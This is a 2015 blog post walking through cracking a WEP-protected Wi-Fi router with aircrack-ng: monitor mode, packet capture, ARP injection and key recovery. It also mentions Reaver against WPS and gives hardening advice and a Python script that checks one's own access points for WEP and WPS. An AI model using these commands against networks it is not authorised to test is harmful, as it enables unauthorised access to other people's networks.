How to hack WEP-protected or WPS-enabled Wi-Fi routers with an Alfa AWUS036NH, or: how to protect your Wi-Fi

Posted on: 22 May 2015

By: Don

A hacker can sit three miles away from a house and still be able to hack into the router and use the Wi-Fi. But how?

Legal

1. It's illegal to hack other people's Wi-Fi routers. Use this guide for educational purposes only and test it only on your own access points (APs).
2. It is forbidden to remove all transmit power restrictions. Every country has its own transmit power limits.

Let's hack your own WEP-protected router now

(You need to install the aircrack-ng packages if you are not using Kali.)

The old WEP standard is highly vulnerable. The whole attack doesn't take more than an hour.

1. Root:

sudo -s

2. Check the wireless adapters:

iwconfig

3. Put the wireless adapter into Monitor Mode:

airmon-ng start wlan2

4. Capture traffic and find your WEP-protected AP:

airodump-ng mon0

5. Capture from the WEP AP you found:

airodump-ng --bssid 00:MY:WE:P0:12:34 -c 11 -w WEPoutput mon0

Replace the BSSID and the channel (-c) number with those of your AP. Wait until a MAC address appears under the STATION section, like MM:AA:CC:5d:5w:r8.

6. Inject ARP traffic to speed up the process:

aireplay-ng -3 -b 00:MY:WE:P0:12:34 -h MM:AA:CC:5d:5w:r8 mon0

7. Crack the password:

aircrack-ng WEPoutput-01.cap

Aircrack Note: “You can run this while generating packets. In a short time, the WEP key will be calculated and presented. You will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128 bit keys. If you are using the PTW attack, then you will need about 20,000 packets for 64-bit and 40,000 to 85,000 packets for 128 bit. These are very approximate and there are many variables as to how many IVs you actually need to crack the WEP key.”

Hack your own WPS-enabled router with Reaver

The WPA2 standard is safe – if you use a complex password and disable WPS. While running possible passwords against huge lists is just a vague bet, WPS cracking, if available, comes with clear results within 5 to 10 hours. New APs no longer have this WPS vulnerability, but those older than 2013 are still hackable through WPS.

So, how can I protect my Wi-Fi router from hackers?

If someone is interested in hacking into your network, he has many ways to do so. As of today, your Wi-Fi is safe if you do the following:

1. Don't use old routers, especially those with the unsafe WEP standard.
2. Turn WPS off. Even on new routers with WPS vulnerability patches, disabling it is the safer bet.
3. Use long, complex, and unnatural passwords: like U.bTj-L&kd+_da8eW$85.
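
To check points 1 and 2 on your own access points, here is an added example (not part of the original post) that reads the text printed by `iw dev <interface> scan` and reports which of your APs still use WEP or advertise WPS. The BSSIDs and the scan sample are constructed, the function names are hypothetical, and the parser assumes the usual `iw` layout: a `BSS` line per AP followed by tab-indented `capability:`, `RSN:`, `WPA:` and `WPS:` fields.

```python
import re

# Constructed sample in the layout printed by `iw dev <interface> scan`.
SAMPLE_SCAN = """\
BSS 02:00:00:aa:bb:01(on wlan0)
\tcapability: ESS Privacy ShortSlotTime (0x0411)
\tSSID: attic-ap
BSS 02:00:00:aa:bb:02(on wlan0)
\tcapability: ESS Privacy ShortSlotTime (0x0411)
\tSSID: living-room
\tRSN:\t * Version: 1
\t\t * Authentication suites: PSK
\tWPS:\t * Version: 1.0
\t\t * Wi-Fi Protected Setup State: 2 (Configured)
BSS 02:00:00:cc:dd:09(on wlan0)
\tcapability: ESS Privacy (0x0011)
\tSSID: neighbour
"""

def findings(f):
    """Turn the flags collected for one AP into checklist findings."""
    out = []
    if not f["privacy"]:
        out.append("no encryption")
    elif not (f["rsn"] or f["wpa"]):
        # Privacy bit set but no WPA/RSN element: the AP is running WEP.
        out.append("WEP in use")
    if f["wps"]:
        out.append("WPS advertised")
    return out

def audit_own_aps(scan_text, own_bssids):
    """Return {bssid: [findings]} for the APs listed in own_bssids only."""
    own = {b.lower() for b in own_bssids}
    flags, current = {}, None
    for line in scan_text.splitlines():
        m = re.match(r"BSS ([0-9a-fA-F:]{17})", line)
        if m:  # new BSS record; track it only if the BSSID is ours
            bssid = m.group(1).lower()
            current = flags.setdefault(bssid, dict(privacy=False, rsn=False, wpa=False, wps=False)) if bssid in own else None
        elif current is not None:
            field = line.strip()
            tag = field.split(":", 1)[0]
            if tag == "capability":
                current["privacy"] = "Privacy" in field.split()
            elif tag in ("RSN", "WPA", "WPS"):
                current[tag.lower()] = True
    return {b: findings(f) for b, f in flags.items()}

if __name__ == "__main__":
    print(audit_own_aps(SAMPLE_SCAN, ["02:00:00:aa:bb:01", "02:00:00:aa:bb:02"]))
```

An empty list for an AP means neither problem was seen in that scan; APs not in your own list are ignored.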